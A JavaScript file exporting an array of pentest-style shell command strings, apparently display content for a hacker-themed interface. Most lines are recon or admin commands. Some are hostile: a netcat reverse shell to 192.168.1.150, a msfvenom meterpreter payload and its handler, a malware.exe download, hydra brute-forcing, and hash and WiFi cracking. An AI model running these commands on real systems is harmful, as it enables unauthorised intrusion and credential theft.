export const terminalCommands = [
  "$ nmap -sS -O 192.168.1.10",
  "$ sqlmap -u 'http://192.168.1.20/product.php?id=2' --dbs",
  "$ john --wordlist=rockyou.txt local_hashes.txt",
  "$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.30; set LPORT 4444; run'",
  "$ wireshark -i eth0 -f 'tcp port 443'",
  "$ hydra -l admin -P passlist.txt ssh://192.168.1.25",
  "$ gobuster dir -u http://192.168.1.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt",
  "$ nikto -h http://192.168.1.40",
  "$ hashcat -m 0 -a 0 hashes.txt rockyou.txt",
  "$ aircrack-ng -w rockyou.txt wifi_capture.cap",
  "$ burpsuite --proxy-port 8080",
  "$ dirb http://192.168.1.45 /usr/share/dirb/wordlists/common.txt",
  "$ enum4linux -a 192.168.1.50",
  "$ nc -lvp 4444",
  "$ tcpdump -i any -s 0 -w sniffed_traffic.pcap",
  "$ grep -r 'password' /etc/",
  "$ find / -perm -4000 2>/dev/null",
  "$ ps aux | grep suspicious",
  "$ netstat -tulpn | grep LISTEN",
  "$ ss -tlnp",
  "$ iptables -L -n",
  "$ cat /etc/passwd | grep bash",
  "$ sudo -l",
  "$ id && whoami",
  "$ uname -a",
  "$ ls -la /var/tmp/",
  "$ history | tail -20",
  "$ crontab -l",
  "$ systemctl status sshd",
  "$ journalctl -f",
  "$ tshark -i eth0 -Y 'http.request.method == \"POST\"'",
  "$ burpsuite --headless --project-file=test_project.burp --config-file=config.json",
  "$ nmap --script vuln 192.168.1.100",
  "$ sqlmap -r login_request.txt --batch --threads=10",
  "$ hydra -L users.txt -P passwords.txt ftp://192.168.1.55",
  "$ tcpdump -nn -i eth0 port 443",
  "$ aircrack-ng handshake.cap -b 08:00:27:00:4b:1c -w wordlist.txt",
  "$ john --format=NT --wordlist=rockyou.txt ntlm_hashes.txt",
  "$ hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt",
  "$ gobuster vhost -u http://192.168.1.75 -w /usr/share/wordlists/dirbuster/dns.txt",
  "$ nikto -Tuning 123bde -host http://192.168.1.80",
  "$ enum4linux -U 192.168.1.85",
  "$ nc -nv 192.168.1.90 80",
  "$ iptables -A INPUT -p tcp --dport 22 -j ACCEPT",
  "$ scapy -c 'sniff(filter=\"icmp\", count=10)'",
  "$ nmap -p- -T4 192.168.1.100",
  "$ whois example.org",
  "$ dig A example.org",
  "$ host example.org",
  "$ traceroute 8.8.8.8",
  "$ curl -I http://192.168.1.200",
  "$ wget http://192.168.1.210/malware.exe",
  "$ ssh -i ~/.ssh/id_rsa user@192.168.1.110",
  "$ smbclient -L //192.168.1.120 -U guest",
  "$ mount -t nfs 192.168.1.130:/export /mnt/nfs",
  "$ rsync -avz user@192.168.1.140:/data /backup",
  "$ chattr +i /etc/shadow",
  "$ lsattr /etc/shadow",
  "$ lynis audit system",
  "$ rkhunter --check",
  "$ chkrootkit",
  "$ python3 -m http.server 8000",
  "$ nc -e /bin/bash 192.168.1.150 4444",
  "$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.160 LPORT=4444 -f elf > shell.elf",
  "$ strings suspicious_binary | grep '/bin/sh'",
  "$ lsof -i",
  "$ arp -a",
  "$ ip a",
  "$ ping -c 4 192.168.1.170",
  "$ cut -d: -f1 /etc/passwd",
  "$ awk -F: '($3 >= 1000) {print $1}' /etc/passwd",
  "$ for user in $(cut -d: -f1 /etc/passwd); do sudo -l -U $user; done",
  "$ find /home -type f -name '*.pem'",
  "$ openssl s_client -connect 192.168.1.180:443",
  "$ curl -X POST -d 'username=admin&password=admin' http://192.168.1.190/login",
  "$ ipmitool -I lanplus -H 192.168.1.200 -U admin -P password chassis status",
  "$ docker images",
  "$ docker ps -a",
  "$ docker exec -it container_name /bin/bash",
  "$ kubectl get pods -A",
  "$ kubectl describe pod pod-name -n namespace",
  "$ gcloud compute ssh instance-name --zone=us-central1-a",
  "$ aws s3 ls s3://bucket-name --profile pentest",
  "$ az login",
  "$ az account list",
  "$ az vm list -d -o table"
];
